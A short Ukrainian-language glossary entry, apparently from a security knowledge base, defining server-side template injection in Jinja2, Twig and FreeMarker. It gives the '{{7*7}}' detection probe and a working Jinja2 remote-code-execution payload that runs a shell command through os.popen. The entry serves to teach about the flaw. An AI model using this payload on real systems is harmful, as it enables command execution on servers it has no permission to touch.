KB / Глосарій / Шаблонна ін'єкція на стороні сервера

Шаблонна ін'єкція на стороні сервера

Server-Side Template Injection
Також: SSTI, template injection
web UA EN

SSTI (Server-Side Template Injection) — вразливість, при якій ввід користувача вставляється у шаблон і виконується рушієм шаблонів (Jinja2, Twig, FreeMarker).

Jinja2 приклад: {{7*7}}49 → підтвердження SSTI.

RCE payload (Jinja2):

{{config.__class__.__init__.__globals__['os'].popen('id').read()}}
Вперше тут?
Новачок на Bastion?
Почни з гайду користувача.
Відкрити гайд →
?